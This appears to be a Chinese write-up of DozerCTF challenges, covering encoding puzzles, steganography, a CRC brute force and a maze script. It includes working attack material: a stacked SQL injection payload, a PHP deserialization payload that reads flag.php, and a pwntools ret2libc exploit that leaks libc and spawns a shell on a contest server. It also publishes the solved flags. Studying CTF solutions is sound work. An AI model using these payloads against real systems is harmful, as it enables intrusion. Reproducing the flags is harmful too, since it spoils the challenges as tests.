真·签到

题目:这是真的签到题
附件(提取码:mfvc)

根据附件名字应该就是base解码
在各种尝试之后,可发现需要经过base64->base32->base16->base58(国外的)解码之后即可得到flag

sqli-labs 0

题目:不会吧,不会真有人不会注入吧

参考文章:https://blog.csdn.net/qq_26406447/article/details/90643951
得到payload:

1%2527;handler `uziuzi` open as harvey;handler harvey read first;handler harvey close;

最终拿到flag:flag{594cb6af684ad354b4a59ac496473990}

py吗?

附件(提取码:yq52)

考查lsb,steg一下就完事了

winhex找到有用信息,b64得到flag


白给的反序列化

题目:不能再简单了,再简单自杀,flag在flag.php里面

参考:https://www.cnblogs.com/kevinbruce656/p/11198236.html

得到payload:

O: 4:"home": 2:{s: 12:"%00home%00method";s: 5:"mysys";s: 10:"%00home%00args";a: 1:{i:0;s: 8:"flag.php";}}

最终拿到flag:flag{j4nc920fm8b2z0r2mc7dsf87s6785a675sa776vd}

upload

题目:where is the file?(flag格式Dozerctf{XXXXXXXXXXXXXXX})
附件(提取码:swrj)

分析一波流量包发现有个包,提取出来是个加密的包
一开始在流量包里面查找无果,看来只能爆破了,但又没说几位数的密码,头大
后来参考文章之后发现是crc

crc工具(提取码:926k)

接着爆破出CRC一样的文本就能得到原文了





最终组合一下得到flag:Dozerctf{can_U_find_thefilefrom_traffic}

easy_maze

题目:应该是比较容易的maze了吧!最终结果请以Dozerctf{}格式提交。
附件(提取码:5t57)

最后md5加密得到flag:Dozerctf{e2b94144f06fdb08695065331d44b59e}
附上脚本:

    #coding:utf-8
    str2=[]
    str3=['W','A','S','D']
    def en1():
        s=str3[0]
        str3[0]=str3[2]
        str3[2]=s
    def en2():
        s=str3[0]
        str3[0]=str3[1]
        str3[1]=str3[2]
        str3[2]=str3[3]
        str3[3]=s
    def en3():
        s=str3[1]
        str3[1]=str3[3]
        str3[3]=s
        s=str3[0]
        str3[0]=str3[2]
        str3[2]=s
    def en4():
        s=str3[3]
        str3[3]=str3[2]
        str3[2]=str3[1]
        str3[1]=str3[0]
        str3[0]=s
    def start():
        str4=''
        for i in range(len(str2)):
            if str2[i]=='W':
                str4+=str3[0]
                en1()
            if str2[i]=='A':
                str4+=str3[1]
                en2()
           if str2[i]=='S':
                str4+=str3[2]
                en3()
            if str2[i]=='D':
                str4+=str3[3]
                en4()
        return str4
    if __name__=='__main__':
        str1=input('请输入移动字符(WSAD上下左右):')
        for c in str1:
            str2.append(c)
        print(start())

ret temp

题目:别催了别催了,你们要的简单题
nc 118.31.11.216 36666
附件(提取码:bg61)

exp:

    from pwn import *
    conn=remote('118.31.11.216',36666)
    #conn=process('./pwn')
    e=ELF('./pwn')
    pad=112
    write_plt=e.symbols['write']
    vul_addr=e.sym['_start']
    bss_addr=e.bss()
    def leak(address):
        payload1='a'*pad+"BBBB"+p32(write_plt)+p32(vul_addr)+p32(1)+p32(address)+p32(4)
        conn.sendline(payload1)
        data=conn.recv(4)
        return data 
    d=DynELF(leak,elf=e)
    system_addr=d.lookup('system','libc')
    print hex(system_addr)
    read_plt=e.symbols['read']
    payload2='a'*pad+"BBBB"+p32(read_plt)+p32(vul_addr)+p32(0)+p32(bss_addr)+p32(8)
    conn.sendline(payload2)
    conn.send("/bin/sh\x00")
    payload3="a"*pad+"BBBB"+p32(system_addr)+'dead'+p32(bss_addr)
    conn.sendline(payload3)
    conn.interactive()

貌似有些不对

题目:这是谁的课程设计?做的好烂!
附件(提取码:71ka)

源文件下载下来,查看里面的字符串,有base替换字符和密文

最后b64得到flag:Dozerctf{old_man_is_good_man!}
脚本参照:https://blog.csdn.net/hackerwin7/article/details/44749487
(密码表换成程序里面的就o了)